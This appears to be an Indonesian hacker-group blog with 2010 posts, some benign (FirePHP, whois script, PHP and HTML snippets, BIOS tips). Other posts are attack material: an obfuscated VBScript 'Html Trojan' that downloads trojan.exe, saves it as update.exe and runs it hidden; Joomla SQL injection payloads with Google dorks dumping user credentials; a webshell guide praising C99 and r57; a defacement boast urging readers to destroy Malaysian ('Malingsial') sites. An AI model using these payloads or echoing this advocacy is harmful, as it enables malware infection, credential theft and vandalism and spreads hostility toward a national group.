blis<=========|Gue_ni|=========>blis
| <====(( JATIMCREW )) Waktu Dimana Anak-anak Bangsa Menunjukkan Kreativitasnya-----------|
Darah_2Darah_1

Rabu, 29 Desember 2010

phpBB Exploits

Bagi temen2 yg pingin nonton video exploits phpBB, silahkan download di bawah ini :

Download




ReadMore

Senin, 13 September 2010

FirePHP

FirePHP memungkinkan kita untuk login ke Firebug Console menggunakan simple PHP methode untuk memanggil

Semua data dikirim melalui serangkaian respon header X-FirePHP-Data. Ini berarti bahwa data debug tidak akan mengganggu. Jadi FirePHP cocok untuk pengembangan AJAX dimana JSON atau XML memerlukan respon yang bersih.

<?php

require('FirePHPCore/fb.php')

/* NOTE: You must have Output Buffering enabled via
ob_start() or output_buffering ini directive. */

fb('Hello World'); /* Defaults to FirePHP::LOG */

fb('Log message' ,FirePHP::LOG);
fb('Info message' ,FirePHP::INFO);
fb('Warn message' ,FirePHP::WARN);
fb('Error message',FirePHP::ERROR);

fb('Message with label','Label',FirePHP::LOG);

fb(array('key1'=>'val1',
'key2'=>array(array('v1','v2'),'v3')),
'TestArray',FirePHP::LOG);


function test($Arg1) {
throw new Exception('Test Exception');
}
try {
test(array('Hello'=>'World'));
} catch(Exception $e) {
/* Log exception including stack trace & variables */
fb($e);
}

fb(array('2 SQL queries took 0.06 seconds',array(
array('SQL Statement','Time','Result'),
array('SELECT * FROM Foo','0.02',array('row1','row2')),
array('SELECT * FROM Bar','0.04',array('row1','row2'))
)),FirePHP::TABLE);

?>


Sumber
ReadMore

Selasa, 31 Agustus 2010

Shell Script Untuk Mendapatkan Informasi data center, IP pemilik, Kota dan Negara Dari Nama Domain

#!/bin/bash
# A sample shell script to print domain ip address hosting information such as
# Location of server, city, ip address owner, country and network range.
# This is useful to track spammers or research purpose.
# -------------------------------------------------------------------------
# Copyright (c) 2006 nixCraft project <http://cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
# Last updated on Mar/05/2010
# -------------------------------------------------------------------------

# Get all domains
_dom=$@

# Die if no domains are given
[ $# -eq 0 ] && { echo "Usage: $0 domain1.com domain2.com ..."; exit 1; }
for d in $_dom
do
_ip=$(host $d | grep 'has add' | head -1 | awk '{ print $4}')
[ "$_ip" == "" ] && { echo "Error: $d is not valid domain or dns error."; continue; }
echo "Getting information for domain: $d [ $_ip ]..."
whois "$_ip" | egrep -w 'OrgName:|City:|Country:|OriginAS:|NetRange:'
echo ""

done

Jalankan script berikut ini :
./script.sh cyberciti.biz google.com
Contoh yang keluar:

Getting information for domain: cyberciti.biz [ 74.86.48.99 ]...
OrgName: SoftLayer Technologies Inc.
City: Dallas
Country: US
NetRange: 74.86.0.0 - 74.86.255.255
OriginAS: AS36351

Getting information for domain: google.com [ 209.85.231.104 ]...
OrgName: Google Inc.
City: Mountain View
Country: US
NetRange: 209.85.128.0 - 209.85.255.255

Sumber
ReadMore

Selasa, 10 Agustus 2010

Bingung, apa ni ya Maksudnya??

Aku kan sekarang gi sekolah d luar negeri (LEBAY,... ^_^ ^_^), truss aku tanya d tempat diskusi kayak gni :

password generated with Wordpress
technology?
how to decrypt?
for example:
admin:$P$9UNhia0YtfZBjpIxbzHZMsuL.SXrU9.


habis tu ada yang jawab kayak gni :

Need the salt and it its word press look at the source for the hashing to get an idea of what other information you need...but really u need the salt to crack them, unless they changed out they generate the hash of a password. Otherwise you can crack the salt as well and make it a bitch lol.

Someone correct me or confirm this please.

<?php
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;

function PasswordHash($iteration_count_log2, $portable_hashes)
{
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;

$this->portable_hashes = $portable_hashes;

$this->random_state = microtime() . uniqid(rand(), TRUE); // removed getmypid() for compability reasons
}

function get_random_bytes($count)
{
$output = '';
if ( @is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}

if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .=
pack('H*', md5($this->random_state));
}
$output = substr($output, 0, $count);
}

return $output;
}

function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);

return $output;
}

function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);

return $output;
}

function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) == $output)
$output = '*1';

if (substr($setting, 0, 3) != '$P$')
return $output;

$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;

$count = 1 << $count_log2;

$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
return $output;

if (PHP_VERSION >= '5') {
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
} else {
$hash = pack('H*', md5($salt . $password));
do {
$hash = pack('H*', md5($hash . $password));
} while (--$count);
}

$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);

return $output;
}

function gensalt_extended($input)
{
$count_log2 = min($this->iteration_count_log2 + 8, 24);
# This should be odd to not reveal weak DES keys, and the
# maximum valid value is (2**24 - 1) which is odd anyway.
$count = (1 << $count_log2) - 1;

$output = '_';
$output .= $this->itoa64[$count & 0x3f];
$output .= $this->itoa64[($count >> 6) & 0x3f];
$output .= $this->itoa64[($count >> 12) & 0x3f];
$output .= $this->itoa64[($count >> 18) & 0x3f];

$output .= $this->encode64($input, 3);

return $output;
}

function gensalt_blowfish($input)
{
$itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}

$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;

$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);

return $output;
}

function HashPassword($password)
{
$random = '';

if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) == 60)
return $hash;
}

if (CRYPT_EXT_DES == 1 && !$this->portable_hashes) {
if (strlen($random) < 3)
$random = $this->get_random_bytes(3);
$hash =
crypt($password, $this->gensalt_extended($random));
if (strlen($hash) == 20)
return $hash;
}

if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) == 34)
return $hash;

return '*';
}

function CheckPassword($password, $stored_hash)
{
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] == '*')
$hash = crypt($password, $stored_hash);

return $hash == $stored_hash;
}
}

?>


^code used to generate the hash, may not be the same as your version but ya...


<?php
$wp_hasher = new PasswordHash(8, TRUE);

$password_hashed = '$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/';
$plain_password = 'test';

if($wp_hasher->CheckPassword($plain_password, $password_hashed)) {
echo "YES, Matched";
}
else {
echo "No, Wrong Password";
}
?>


^code from wordpress that can be modified to brute a password, just a fyi lol

That should be everything you need :D


habis itu aku bingung banget apa tu maksud dari jawaban orang tu ya,,....
soalnya bahasa inggris minim banget, jdi ya agak bingung,,,,...
ReadMore

Anti Trojan Elite

Anti Trojan Elite adalah malware remover yang akan mendeteksi dan membersihkan malware pada disk atau memori.
Anti Trojan Elite dapat mendeteksi lebih dari 35.000 trojan, worm dan keyloggers.

Anti Trojan Elite memiliki beberapa Utility:

  1. The network utility [AD] : Dapat digunakan untuk memutuskan koneksi TCP yang mencurigakan.
  2. The process utility : Dapat digunakan untuk membunuh proses yang mencurigakan bahkan proses memiliki sistem priviage, bahkan memiliki kemampuan untuk membongkar modul mencurigakan dalam semua proses.
  3. The registry repair utility : Dapat digunakan untuk memperbaiki registri diubah oleh malware.
  4. The registry monitor utility : Dapat digunakan untuk memperbaiki perubahan dari kunci registri penting dan nilai-nilai dengan real time.

Download :
Anti Trojan Elite

Download :
Trojan Remover
ReadMore

Html Trojan

<script language="VBScript" type="text/javascript">
on error resume next
dl = "www.site.com/trojan.exe"
Set df = ********.createElement("o bject")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cl s4
df.setAttribute "classid",clsfull

strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&st rr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5 &ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&sc ripp3&scripp4&scripp5
set FF = df.createobject(scripp,"" )
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1 )
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Ap plication","")
MM.ShellExecute fnamezz1,"","","open",0
</ s c r i p t >
</BODY>
</HTML></body></html></script>
ReadMore

Sqlmap 0.5 - Automated SQL Injection Tool

==[Features]==

* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end.

* Can also identify Microsoft Access, DB2, Informix and Sybase;

* Extensive database management system back-end fingerprint based upon:
- Inband DBMS error messages
- DBMS banner parsing
- DBMS functions output comparison
- DBMS specific features such as MySQL comment injection
- Passive SQL injection fuzzing

* It fully supports two SQL injection techniques:
- Blind SQL injection, also known as Inference SQL injection
- Inband SQL injection, also known as UNION query SQL injection

Download : sqlmap 0.5
ReadMore

Joomla Component (com_youtube) SQL Injection Vulnerability

==[Google Dork]==

inurl:"com_youtube"

##################################################

===[ Exploit ]===

http://www.site.com/index.php?option=com_youtube&id_cate=4

union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

or

http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

##################################################
ReadMore

Senin, 09 Agustus 2010

Joomla Component SQL Injection Vulnerability

[Google Dork]:

inurl:com_content

Exploit :

http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

http://localhost/index.php?option=com_content&task=blogcategory&id=60 Itemid=99999+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users/*
ReadMore

Minggu, 01 Agustus 2010

Remove Element from array

Bagi yang udah ngerti atau udah merasa master skip ja bacaan yang tidak berguna ini, soalnya ini hanya hasil Copas ja....

Kode ini menghapus elemen dari sebuah array, kita bisa memasukkan salah satu kunci atau nilai dari elemen yang ingin kita hapus :


<?
$arr[]="abdy";
$arr[]='andy';
$arr[]='elis';
$arr[]='budiono';
$arr[]='Isa';

unset_arr($arr,"key","9");
function unset_arr($arr, $searchField="value",$value)
{
echo "Array 1:= ";print_r($arr);
if($searchField=="key")
{
if(array_key_exists($value,$arr))
{
echo "Key= $key is unset....!";
}
else
echo "Key=$value is not exist in array<br />";
}
else
{
$found=array_search($value,$arr);
if($found!="") unset($arr[$found]);
else
echo "Given value is not exist in array.....!<br />";
}
echo "<br />";
$arr=array_values($arr);
echo "Array Result==";
print_r($arr);
return $arr;
}
?>

Moga bermanfaat,,, :) :)
ReadMore

Senin, 12 Juli 2010

PYTHON HYPERSCHEMA 3.0

Hyperschema Python merupakan proyek domain open source publik, dan sangat bagus untuk HTML hypermaps dari skema database SQL, terdiri dari dua PL kecil / file SQL dan satu Python (atau C) file source code. Halaman HTML yang dihasilkan memiliki data mousover menampilkan untuk semua kunci, serta daftar hyperlink dari semua kata kunci menunju ke semua tujuan masing-masing dan indeks utama semua tabel.


Sekarang Versi 3.0 sudah keluar, di samping terjemahan dari C Python ini perbaikan minor bug yang di rilis versi 2,1.


Petunjuk ada di file README disertakan dengan zip dan Tgz.

Sumber : Hyperschema
ReadMore

Jumat, 09 Juli 2010

Background color Link

Pagi yang udh ngerti atau udh master jangan d ketawain ya postingan saya ni,, soalnya saya masih blajar... ^_^ ^_^

Codescript ini secara dinamis mengubah warna background link di halaman situs. Kontrol warna menggunakan onMouseOver, onMouseOut, onClick, dan kombinasi dari semua itu.

Letakkan kode di antara <body> dan </ body> di halaman HTML dimana kita ingin link muncul. Edit teks link yg diberikan untk titik di halaman yang ingin kita buka.

Langkah 1 : Gunakan kode ini untuk mengubah warna latar belakang ketika pengguna mouse tempat link.

<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>


Langkah 2 : Gunakan kode ini untuk mengubah warna latar belakang ketika pengguna menghilangkan mouse dari atas link (onMouseOut).

<a href="link.htm" onMouseOut="document.bgColor='#00ff00'">Link Text</a>


Langkah 3 : Gunakan kode ini untuk mengubah warna latar belakang ketika pengguna mengklik link (onClick).

<a href="link.htm" onClick="document.bgColor='#0000ff'">Link Text</a>


Langkah 4 : Gunakan kode ini untuk mengubah warna latar belakang dua kali, terus ketika pengguna tempat mouse di atas link, kemudian ketika pengguna mengambil mouse dari link (onMouseOver dan onMouseOut).

<a href="link.htm" onMouseOver="document.bgColor='#ff0000'"> onMouseOut="document.bgColor='#00ff00'">Link Text</a>


Langkah 5 : Gunakan kode ini untuk mengubah warna latar belakang tiga kali, terus ketika pengguna tempat mouse di atas link, kemudian ketika pengguna mengambil mouse dari link, dan ketika pengguna mengklik pada link (onMouseOver, onMouseOut, dan onClick).

<a href="link.htm" onMouseOver="document.bgColor='#ffff00'" onMouseOut="document.bgColor='#00ff00'" onClick="document.bgColor='#0000ff'">Link Text</a>


Untuk "link.htm" bisa kita ganti dgn alamat link yg kita tuju, contohnya :

<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>


Menjadi :

<a href="http://geoweek.wordpress.com" onMouseOver="document.bgColor='#ffffff'">Geoweek</a>


Untuk kode warna Background yg brwarna merah bisa kita ganti sesuai dgn warna kesukaan kita...
ReadMore

Kamis, 08 Juli 2010

Tips Membuat Aplikasi PHP Yang Aman


Vulnerabilities atau kelemahan keamanan pada aplikasi berbasis web menggunakan PHP merupakan hal yang tak habis-habisnya dibahas. Tulisan kali ini berisi tip dan trik membuat aplikasi PHP yang aman.

* Perhatikan Register Global selalu dalam kondisi OFF.

Sebenarnya tidaklah selalu benar bahwa jika register global berkondisi on lantas aplikasi PHP yang dibuat tidak aman. Ini semua bergantung kepada bagaimana seorang programmer membuat script-nya.

Berikut contoh kelemahan keamanan yang disebabkan oleh kesalahan dalam penulisan script yang mengakibatkan penyerang dapat dengan mudah memanfaatkan register global berkondisi on.

[php]
// lokasi script: http://localhost/login.php
// script login yang dipanggil dari sebuah form untuk masuk kedalam halaman Admin

// set variable $oke manjadi true jika autentifikasi sukses
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}

if ($oke) {
// masuk ke halaman admin
}
[/php]

Sekilas kode script diatas adalah kode yang aman, tetapi sebenarnya sama sekali tidak dengan kondisi register global on. Mengapa? Halaman Admin bisa diakses oleh siapa pun tanpa proses authentifikasi melalui alamat http://localhost/login.php?oke=true.

Bagaimana memperbaiki script diatas? Anda cukup menambahkan inisialisasi diawal seperti berikut:

[php num=5]
// Inisialisasi variable $oke
$oke=false;

if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}
[/php]

atau

[php num=5]
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
} else { // jika authentifikasi gagal, set variable $oke menjadi false
$oke=false;
}
[/php]


Contoh script diatas adalah salah satu dari kelemahan keamanan yang disebabkan oleh register global berkondisi on. Di sisi lain, programmer juga harus turut menanggung dosa akibat teknik programmingnya yang membuka kesempatan penyerang untuk mengeksploitasi kelemahan keamanan.

Teknik lain untuk mengamankan aplikasi dari ancaman register global berkondisi on adalah menerapkan apa yang disebut Security Throuh Obscurity (keamanan dengan teknik penyembunyian). Hanya saja, kelemahan keamanan akan segera ditemukan jika aplikasi dibuat menjadi aplikasi opensource, dimana calon penyerang dapat melihat sourcecode-nya secara langsung.

Jadi memang tidak benar 100% kalau kelemahan keamanan aplikasi PHP bermula dari register global berkondisi on. Ekploitasi kelemahan keamanan sistem hanya terjadi akibat kesalahan teknik dalam pembuatan program, dan karena aplikasi dibuat menjadi opensource yang memungkinkan calon penyerang melihat sourcecode nya secara langsung.

ReadMore

Senin, 28 Juni 2010

Webshell

Tujuan utama dari berbagai macam serangan (sistem/web) umum nya adalah mendapatkan shell target, entah itu ‘direct shell’ ataupun ‘web shell’. Shell merupakan suatu interpreter yang disediakan oleh sistem operasi agar dapat digunakan oleh user untuk berinteraksi dengan sistem tersebut.

Contoh simple:

Cyberweb:~ cyberWeb$ pwd

/Users/cyberweb

Banyak sekali yang sering menggunakan shell namun tidak sadar bahwa itu adalah shell. Contohnya adalah bash pada linux, ataupun command prompt pada M$ Windows. Jenis exploitasi khusus nya yang dilakukan secara remote (remote exploitation) selalu berusaha semaksimal mungkin untuk mendapatkan shell target, tujuan nya jelas agar kita dapat mengendalikan target melalui shell tersebut. Banyak hal yang dapat kita lakukan setelah berhasil mendapatkan shell target.

Untuk serangan yang ditujukan terhadap aplikasi-aplikasi web, umum nya juga berusaha untuk mendapatkan shell target. Walaupun memungkinkan untuk mendapatkan system shell, pada kenyataan nya untuk tahap awal banyak yang menggunakan webshell setelah proses eksploitasi aplikasi web. Shell merupakan interpreter untuk berinteraksi dengan sistem, jenis shell yang memanfaatkan protokol http (web) untuk berinteraksi dengan sistem sering disebut webshell. Karena webshell ini berjalan diatas protokol HTTP, maka webshell membutuhkan suatu webserver. Jika pada sistem shell kita membangkitkan shell melalui aplikasi bash, csh, ksh (UNIX like) ataupun cmd.exe (Windows) maka pada web shell kita membangkitan shell melalui aplikasi .php, .asp, ataupun .jsp. Jenis webshell yang dapat digunakan tergantung pada teknologi target, jika target menggunakan aplikasi php maka kita harus menggunakan tipe phpshell dan jika target menggunakan asp maka kita harus menggunakan tipe aspshell.

Bagaimana cara kita mendapatkan web shell pada target tergantung pada jenis hole yang akan di eksploitasi serta kreativitas si penyerang, untuk RFI misal nya…kita tidak perlu upload webshell tersebut ke server target karena jenis hole ini akan membuat target meng-eksekusi webshell pada mesin lain. Namun untuk jenis hole pada web lain nya, kita dapat membodohi target untuk secara tidak sengaja men-download webshell tersebut dan selanjut nya kita dapat mengeksekusi webshell langsung via browser (http). Ada banyak sekali jenis webshell, baik yang sifat nya private ataupun public. Dan setiap webshell memiliki beberapa fungsi umum (seperti listing isi directory, menampilkan informasi sistem, dll) serta beberapa fungsi khusus (safe-mode bypass, encoder, sql-injection, backdooring, dll). Dan biasa nya, jenis webshell bersifat private merupakan hasil pengembangan dari jenis webshell lain dengan melakukan kustomisasi untuk mendapatkan fungsi lain yang kita inginkan.

Berikut ini adalah beberapa jenis webshell (public/private) yang umum digunakan oleh kalangan underground dalam melakukan serangan terhadap aplikasi-aplikasi web, beberapa jenis webshell dibawah ini merupakan favorite saya secara pribadi karena memiliki cukup banyak fungsionalitas, tentu saja masih banyak lagi jenis webshell dengan kemampuan khusus namun beredar di kalangan tertentu. So, here they are:

* C99Shell, C99 merupakan webshell produksi dari CCTeam rusia, C99 memiliki cukup banyak fitur yang terus dikembangkan dan saat ini banyak jenis private webshell menggunakan C99 sebagai template/base nya.

* r57, Jenis webshell r57 juga banyak digunakan serta dijadikan base template oleh berbagai jenis private webshell. Kalangan underground di Indonesia umum nya menggunakan webshell r57 ini .

* Explorer ASP, Webshell ini merupakan contoh webshell untuk target yang menggunakan teknologi ASP.

* Ekin0x, merupakan contoh private shell (seperti nya sekarang sudah public) dari cyber warrior security tim, webshell ini juga memiliki beberapa fungsi tambahan yang berbeda dari webshell lain.

* Locus7s webshell, Contoh webshell ini merupakan hasil pengembangan dari c100, C100 merupakan webshell rilis baru dari CCTeam (Captain Crunch Team) yang merupakan hasil pengembangan dari C99, kita bisa melihat bahwa webshell tersebut di customize oleh Locus7s team dan ditambahkan beberapa fungsi baru untuk kebutuhan private.

Itu adalah berbagai macam jenis webshell, kita bisa lihat bahwa webshell-webshell tersebut menyediakan fasilitas point-and-click sehingga memudahkan kita untuk meng-eksplorasi sistem target serta menjalankan fungsionalitas lain (seperti backdooring, brute-force, dll). Jenis webshell diatas termasuk webshell modern, namun bagi yang suka dengan webshell classic bisa menggunakan jenis webshell seperti ssh-webshell.

Jika kita mau bersusah payah sedikit untuk mempelajari code-code yang terdapat pada webshell-webshell tersebut, maka kita dapat membuat versi private milik kita ataupun kelompok kita pribadi. Dan juga menambahkan berbagai macam fungsi tambahan yang menurut kita akan sangat berguna. So, lagi-lagi dibutuhkan skill programming…khusus nya pemrograman aplikasi web seperti php dan asp. Selanjut nya, kita dapat menggunakan code-code diatas sebagai template / base untuk mengembangkan webshell milik kita pribadi (fungsi blind sql-injection, mass-defacing, scanner, dll bisa ditambahkan sendiri). Untuk jenis webshell yang lebih lengkap bisa mencoba webkit dari open-labs.
ReadMore

Selasa, 18 Mei 2010

Gara2 maen Depes..

Ini gara2 aku suka maen depes2n ke berbagai situs,, situs apa ja pasti aku hajar...
tiba waktu hajar situs ini : http://___.eu/
ini mirrorny :

http://indonesiandefacer.org/mirror/2010/05/rn4cast.html

FB ku langsung di Add sama yg punya sever situs itu, orang itu namanya "Tom Standaert" dy katanya orang Belgium, tpi aku gk curiga kalau orang itu adalah yang punya sever situs itu, habis itu ya terjadilah obrolan2 di FB saling bales Coment. Berikut ini adalah obrolanku sama yg punya sever situs itu :


KidDevilz Hde : thanks for the add,,, ^_^, where are you from??

Monday at 11:06pm · Comment · Like · See Wall-to-Wall


Tom Standaert : Belgium. Nice to meet you.

Apparently you hacked a website hosted one one of my servers :p
Backups, so no harm done.
It was http://www._____.eu/

Not sure if it was really you off course. It was signed

KidDevilz

.::Hacked By KidDevilz::.
With a reference to HDE.

Ring a bell? I noticed the apache allowed .inc files and also found several other vulnerabilities, but my main concern is that this website runs a -very early- version of an open source generic CMS system I'm developing, and maybe there might be a serious security hole I missed.
Although I'm aware of several in this version of the program.

Regards,

Tom

Yesterday at 2:38am


Tom Standaert : ok, found it on your wall - yesterday 0:38
care to share how?
SQL injection, the inc files , php injection?

Yesterday at 2:59am


Tom Standaert : by the way: it 's a non-profit organisation for whom I work for free, so not a very nice thing to delete their data ;)

Yesterday at 3:38am


KidDevilz Hde : yea, indeed my actions at the site was hacked, but I did not destroy or delete all the files that exist on the site, just tells me that the site was still a hole Gap ...
I only use SQL injection..

I apologize if less polite ...

I am glad to be your acquaintance same..

Yesterday at 5:08am ·


Tom Standaert : no problem, and as I said, no real harm was done, only some data in the mysql replaced.
I was just wondering how you did it. It was build fast because I did it for free, so I'm aware there might be several severe security holes.
Could you give me some more details on where exactly the huge gap is?

Yesterday at 5:16am


KidDevilz Hde : I only use sql-injection,,,,

if I may I help you, then I will tell you how Patch Technique Common Simple Web Attack ..

but I want to go to bed, because I was sleepy heavy ...... See More
had two days I did not sleep ..

I'll send to your facebook message ..

Yesterday at 5:26am ·


Karena aku udah ngantuk berat jadi ya gak aku lanjutin ngobrol2nya sama org tu...
dari pada ilang obrolan itu makanya aku buat update d blogku tercinta ini, buat kenang2an,,

Buat temen2 yg suka maen depes2n, jangan mendelet semua file yg da d situs itu..
Tpi kalau situsnya Malingsial Hancurkan ja sampek ke akar2nya sampek Down, pokok nya jangan d kasih ampun buat Malingsial...


.::| Salam UnderGround |::.
ReadMore

Rabu, 12 Mei 2010

3 'Jagoan' IT Tanpa Bekal Ijazah

Bagi sebagian orang ijazah dari perguruan tinggi adalah faktor yang menentukan kesuksesan di masa depan. Tapi bagi tiga jagoan IT dunia, ijazah ternyata bukanlah satu-satunya kunci untuk meraih kesuksesan.
Tahukah anda bila nama-nama besar seperti pendiri Microsoft, Bill Gates, pendiri Apple Steve Jobs, dan Pendiri Facebook, Mark Zuckerberg meraih sukses tanpa berbekal ijazah dari tempat kuliah masing-masing.

Gates bahkan dikenal sebagai orang paling sukses yang dikeluarkan dari kampusnya di Harvard University. Suami dari Mellinda ini, masuk Harvard di tahun 1973, tapi dua tahun kemudian keluar dari kampus dan bersama temannya Paul Allen ia mendirikan Microsoft.

Pria yang pernah dinobatkan dalam jajaran pria terkaya dunia selama satu dekade itu, akhirnya mendapat gelar Doktor Honoris Clausa dari bekas kampusnya di tahun 2007. "Mungkin saya membawa pengaruh yang buruk," canda Gates.

Jagoan IT berikutnya, Steve Jobs diketahui drop out dari Reed College. Ia hanya duduk di kampus tersebut kurang lebih enam bulan. setelah itu ia fokus untuk mendirikan Apple, neXT Computer dan Pixar. Karya-karyanya telah mempengaruhi pengembangan dunia komputer di Dunia.

Seolah mengikuti jejak kakak tingkatnya, pendiri Facebook Mark Zuckerberg juga meninggalkan bangku kampusnya di Harvard. Tapi situs jejaring pertemanannya yang dikembangkannya telah membius jutaan orang di dunia dan menghasilkan uang setidaknya sekira USD4 juta.

Diluar nama-nama 'jagoan' IT tersebut, juga banyak bintang terkenal yang juga meraih kesuksesan tanpa berbekal ijazah perguruan tinggi, sebut saja aktor Tom Hanks, Harisson Ford, Lady Gaga, hingga James Cameron.
ReadMore

Kamis, 29 April 2010

Bikin Ngakak..

Ini adalah gambar2 waktu chathing yang bikin aku tertawa ngakak, memalukan, menyedihkan,dll. tpi untung juga waktu di tanya balik aku gak jujur2 kali, mungkin kalau jujur2 kali tambah memalukan, ni adalah sebagian gambar yang sempet aku save soalnya waktu itu komputer yang aku pake' tiba2 error... :( :( . Mungkin kalau sempet aku save semua mungkin tambah seru ngakaknya... =)) =))


Berikut ini adalah gambar2nya :









Spesial terimakasih buat Priscyla Mariebeth dan Abang Mywisdom yang telah bikin aku tertawa ngakak sampek perutku sakit malem itu,,,,,,, =)) =)) =))
ReadMore

Kamis, 11 Maret 2010

Cara Aman Mengotak-atik Setting BIOS PC


Bila Windows adalah wajah ramah yang ditampilkan proyek-proyek komputer kepada dunia, maka BIOS adalah sisi gelap bawah sadar yang bertugas untuk berpikir. BIOS (Basic Input/Output System) adalah kode untuk fungsi-fungsi fundamental PC, seperti mengumpulkan ketukan tombol dari keyboard atau meletakkan pixel ke layar.


Program kecil ini bekerja di balik layar, menterjemahkan perintah Windows yang people-friendly menjadi angka nol dan satu yang hanya dimengerti oleh hardware Anda. Dan sebagaimana alam bawah sadar manusia, BIOS bisa berpengaruh sangat kuat pada tingkah laku dan kinerja PC Anda.

Terapi BIOS

Ketika teknologi baru muncul dan bug tua ditemukan, para pembuat komputer sering menerbitkan versi BIOS yang telah diupdate yang dapat mengatasi problem dan meningkatkan kinerja. Periksa situs Web pembuat PC Anda mengenai update terbaru. Namun pertama-tama pastikan Anda memiliki nomor versi terbaru BIOS; biasanya muncul sekilas di monitor Anda tepat setelah Anda menyalakan sistem. (Tekan tombol Pause bila kilasannya terlalu cepat.)

Mengupdate BIOS mudah, tetapi Anda harus melakukannya dengan hati-hati. Biasanya Anda perlu menjalankan program kecil dari floppy disk saja. Namun bila terjadi masalah, Anda hanya bisa meratapi motherboard yang tidak bisa lagi Anda gunakan. Jadi pastikan bahwa sebelumnya Anda telah membaca semua instruksi di file readme BIOS update. Dan selalu lakukan persis seperti apa yang petunjuk-petunjuk itu katakan.

Jika BIOS adalah bawah sadar PC, maka utiliti Setup merupakan fondasi untuk membangun karakter PC. Utiliti tersebut memiliki setting user untuk mengontrol harddisk, memori, kartu-kartu grafis, power saving, port USB, dan hardware lain. Program tersebut biasanya disertakan dalam disk, tetapi sekarang sudah tersimpan dalam chip ROM yang sama dengan BIOS PC.

Untuk membuka Setup, cukup tekan tombol (atau kombinasi tombol) yang disarankan kepada Anda untuk dimasukkan ketika PC melakukan start up. Masing-masing pembuat BIOS menggunakan tombol yang berbeda — Delete, F1, atau F10. Di layar Anda seharusnya memperlihatkan tombol atau tombol-tombol mana yang perlu ditekan untuk Setup tepat setelah layar menampilkan angka versi BIOS. Jika tidak, periksa dokumentasi sistem Anda.

Karena utiliti Setup dibuat oleh pembuat BIOS dan berada dalam chip yang sama dengan BIOS, ini sering disebut utiliti BIOS Setup. Dan karena utiliti ini menyimpan settingnya di chip clock/calendar — chip complementary metal-oxide semiconductor, atau CMOS — maka sering pula disebut sebagai program Setup CMOS. (Chip CMOS memiliki batere sendiri untuk memelihara setting chip sekalipun PC dimatikan.)

